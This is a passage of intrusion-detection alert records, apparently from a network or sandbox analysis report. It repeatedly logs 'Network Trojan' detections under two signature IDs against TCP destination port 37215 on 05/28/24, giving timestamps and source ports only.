            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.541782
            SID:2835222
            Source Port:37580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508139
            SID:2829579
            Source Port:48022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291296
            SID:2829579
            Source Port:34824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039655
            SID:2835222
            Source Port:60698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739053
            SID:2829579
            Source Port:59290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059919
            SID:2829579
            Source Port:46538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320247
            SID:2835222
            Source Port:52804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518610
            SID:2829579
            Source Port:51302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640571
            SID:2829579
            Source Port:49238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.443897
            SID:2835222
            Source Port:45928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753380
            SID:2829579
            Source Port:57042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963784
            SID:2829579
            Source Port:54090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025166
            SID:2835222
            Source Port:33760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994798
            SID:2829579
            Source Port:58542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863733
            SID:2829579
            Source Port:41588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550418
            SID:2835222
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818086
            SID:2835222
            Source Port:38492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865331
            SID:2835222
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864385
            SID:2835222
            Source Port:37034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682073
            SID:2829579
            Source Port:55018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778355
            SID:2835222
            Source Port:44810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436501
            SID:2835222
            Source Port:58704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935046
            SID:2835222
            Source Port:48802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927036
            SID:2835222
            Source Port:41788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734333
            SID:2829579
            Source Port:43652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760427
            SID:2835222
            Source Port:48072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.695975
            SID:2829579
            Source Port:35138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880948
            SID:2829579
            Source Port:47800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004846
            SID:2835222
            Source Port:59508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231133
            SID:2835222
            Source Port:51102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426862
            SID:2829579
            Source Port:55808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811179
            SID:2829579
            Source Port:54204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989602
            SID:2835222
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679996
            SID:2835222
            Source Port:54164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046101
            SID:2835222
            Source Port:40912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414315
            SID:2835222
            Source Port:49974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899905
            SID:2835222
            Source Port:42188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935131
            SID:2835222
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831701
            SID:2829579
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055079
            SID:2829579
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349214
            SID:2829579
            Source Port:49124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917605
            SID:2829579
            Source Port:56698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.411906
            SID:2829579
            Source Port:60408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847271
            SID:2835222
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811775
            SID:2835222
            Source Port:35478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574978
            SID:2835222
            Source Port:42018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999244
            SID:2835222
            Source Port:57564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745696
            SID:2829579
            Source Port:38384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721916
            SID:2835222
            Source Port:59828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870456
            SID:2829579
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778271
            SID:2835222
            Source Port:48346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426846
            SID:2829579
            Source Port:41580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770720
            SID:2829579
            Source Port:38182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714952
            SID:2835222
            Source Port:42458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298635
            SID:2829579
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398346
            SID:2829579
            Source Port:42316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435830
            SID:2829579
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.345009
            SID:2835222
            Source Port:38600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.681594
            SID:2835222
            Source Port:52060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623424
            SID:2829579
            Source Port:39758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001606
            SID:2835222
            Source Port:47726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381502
            SID:2829579
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.591596
            SID:2835222
            Source Port:52568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158420
            SID:2829579
            Source Port:40432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565710
            SID:2835222
            Source Port:43260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943031
            SID:2829579
            Source Port:34390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910340
            SID:2829579
            Source Port:52876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378110
            SID:2829579
            Source Port:56912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073024
            SID:2835222
            Source Port:46322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905089
            SID:2829579
            Source Port:52878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738551
            SID:2835222
            Source Port:38138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918323
            SID:2829579
            Source Port:39942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.302178
            SID:2835222
            Source Port:36552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024568
            SID:2829579
            Source Port:57706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597295
            SID:2835222
            Source Port:46094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544183
            SID:2835222
            Source Port:53926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841465
            SID:2835222
            Source Port:50936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470171
            SID:2835222
            Source Port:48680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875528
            SID:2829579
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996320
            SID:2835222
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821430
            SID:2835222
            Source Port:53982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870707
            SID:2835222
            Source Port:38078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510173
            SID:2835222
            Source Port:37422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759909
            SID:2829579
            Source Port:36198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916588
            SID:2835222
            Source Port:42852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034857
            SID:2829579
            Source Port:51184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827329
            SID:2829579
            Source Port:53158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555164
            SID:2829579
            Source Port:48842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810841
            SID:2835222
            Source Port:48458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311107
            SID:2829579
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966478
            SID:2829579
            Source Port:56478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547901
            SID:2829579
            Source Port:52662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071778
            SID:2829579
            Source Port:43046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952593
            SID:2835222
            Source Port:36750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318127
            SID:2835222
            Source Port:37436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782908
            SID:2835222
            Source Port:53272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934115
            SID:2829579
            Source Port:35462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510861
            SID:2829579
            Source Port:42512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507172
            SID:2835222
            Source Port:51024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999394
            SID:2835222
            Source Port:41592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398409
            SID:2835222
            Source Port:58724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433413
            SID:2835222
            Source Port:54670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669391
            SID:2829579
            Source Port:37392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651448
            SID:2835222
            Source Port:52674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762484
            SID:2835222
            Source Port:43630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820604
            SID:2829579
            Source Port:42780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754969
            SID:2829579
            Source Port:33042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054317
            SID:2829579
            Source Port:47718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014895
            SID:2835222
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714612
            SID:2835222
            Source Port:58130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451556
            SID:2829579
            Source Port:40366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847505
            SID:2829579
            Source Port:50488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290465
            SID:2835222
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.687483
            SID:2835222
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070069
            SID:2835222
            Source Port:60448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776878
            SID:2829579
            Source Port:54360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506456
            SID:2835222
            Source Port:38384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867944
            SID:2835222
            Source Port:46634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856307
            SID:2829579
            Source Port:50848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807582
            SID:2829579
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851987
            SID:2829579
            Source Port:58954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870815
            SID:2829579
            Source Port:37492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376869
            SID:2835222
            Source Port:35990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868447
            SID:2829579
            Source Port:53198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261073
            SID:2829579
            Source Port:55500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805519
            SID:2829579
            Source Port:35452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766800
            SID:2835222
            Source Port:59602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809560
            SID:2835222
            Source Port:54680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279518
            SID:2835222
            Source Port:55232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046163
            SID:2835222
            Source Port:39322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542374
            SID:2835222
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864496
            SID:2835222
            Source Port:38440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809213
            SID:2835222
            Source Port:47352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828084
            SID:2835222
            Source Port:42692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046913
            SID:2829579
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026640
            SID:2829579
            Source Port:41858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003990
            SID:2835222
            Source Port:55394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374000
            SID:2835222
            Source Port:34862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881025
            SID:2835222
            Source Port:49624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.723362
            SID:2835222
            Source Port:43228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954083
            SID:2829579
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656212
            SID:2829579
            Source Port:48712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906432
            SID:2835222
            Source Port:40224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.854769
            SID:2829579
            Source Port:37734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755972
            SID:2829579
            Source Port:49988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486801
            SID:2835222
            Source Port:58086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714383
            SID:2829579
            Source Port:58372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037824
            SID:2829579
            Source Port:37614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444807
            SID:2829579
            Source Port:57250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046595
            SID:2829579
            Source Port:43434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938248
            SID:2835222
            Source Port:58918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824187
            SID:2829579
            Source Port:46352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532943
            SID:2835222
            Source Port:53854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845117
            SID:2829579
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922246
            SID:2835222
            Source Port:42174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778501
            SID:2835222
            Source Port:42558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352165
            SID:2829579
            Source Port:37888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901496
            SID:2835222
            Source Port:60270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336105
            SID:2835222
            Source Port:55484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779115
            SID:2829579
            Source Port:33278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.345037
            SID:2835222
            Source Port:60090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.924521
            SID:2829579
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848912
            SID:2835222
            Source Port:52106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864655
            SID:2835222
            Source Port:39268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384752
            SID:2835222
            Source Port:48742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387950
            SID:2835222
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469801
            SID:2829579
            Source Port:33144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499762
            SID:2829579
            Source Port:34740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590639
            SID:2829579
            Source Port:54186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532245
            SID:2829579
            Source Port:47918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755075
            SID:2829579
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001491
            SID:2835222
            Source Port:54060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861947
            SID:2835222
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.403575
            SID:2835222
            Source Port:51186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371334
            SID:2835222
            Source Port:38034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716057
            SID:2835222
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809672
            SID:2835222
            Source Port:51730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851135
            SID:2829579
            Source Port:52372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920231
            SID:2835222
            Source Port:42350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996003
            SID:2829579
            Source Port:60830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961438
            SID:2829579
            Source Port:55034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784700
            SID:2835222
            Source Port:56606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437280
            SID:2835222
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113494
            SID:2835222
            Source Port:57438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552974
            SID:2829579
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770849
            SID:2829579
            Source Port:51046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597062
            SID:2829579
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843616
            SID:2829579
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563389
            SID:2829579
            Source Port:50262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709505
            SID:2829579
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854119
            SID:2835222
            Source Port:46430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616253
            SID:2829579
            Source Port:39456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.903773
            SID:2829579
            Source Port:52552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709616
            SID:2829579
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021774
            SID:2835222
            Source Port:54840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321623
            SID:2835222
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344982
            SID:2829579
            Source Port:37660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
